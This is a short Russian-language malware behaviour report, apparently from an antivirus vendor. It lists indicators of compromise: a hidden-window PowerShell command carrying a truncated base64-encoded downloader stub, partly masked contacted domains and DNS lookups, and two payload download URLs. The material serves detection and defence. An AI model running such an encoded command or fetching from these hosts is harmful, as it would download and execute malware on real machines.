Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEcAYwBfAF8AQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFgAQQAnACwAJwB2AGsAUQBRAEEARAAnACkAOwAkAEIAUQB3AEEAVQBjAEEAbwA9AG4AZQB3AC0AYABvAGIAYABKAGUAQwBUACAAKAAnAE4AZQB0AC4AVwBlAGIAQwAnAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1020230.cvr
- 'wz##w.com':443
- 'al###aemlak.com':80
- 'ac###sdig.com':443
- 'la####apharma.com':80
- 'la####apharma.com':443
- 'et#####womenawards.com':443
- http://al###aemlak.com/wp-contents/H2JCh/
- http://la####apharma.com/fobn/0aWU/
- 'ac###sdig.com':443
- 'la####apharma.com':443
- DNS ASK wz##w.com
- DNS ASK al###aemlak.com
- DNS ASK ac###sdig.com
- DNS ASK la####apharma.com
- DNS ASK et#####womenawards.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEcAYwBfAF8AQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFgAQQAnACwAJwB2AGsAUQBRAEEARAAnACkAOwAkAEIAUQB3AEEAVQBjAEEAbwA9AG4AZQB3AC0AYABvAGIAYABKAGUAQwBUACAAKAAnAE4AZQB0AC4AVwBlAGIAQwAnAC...' (со скрытым окном)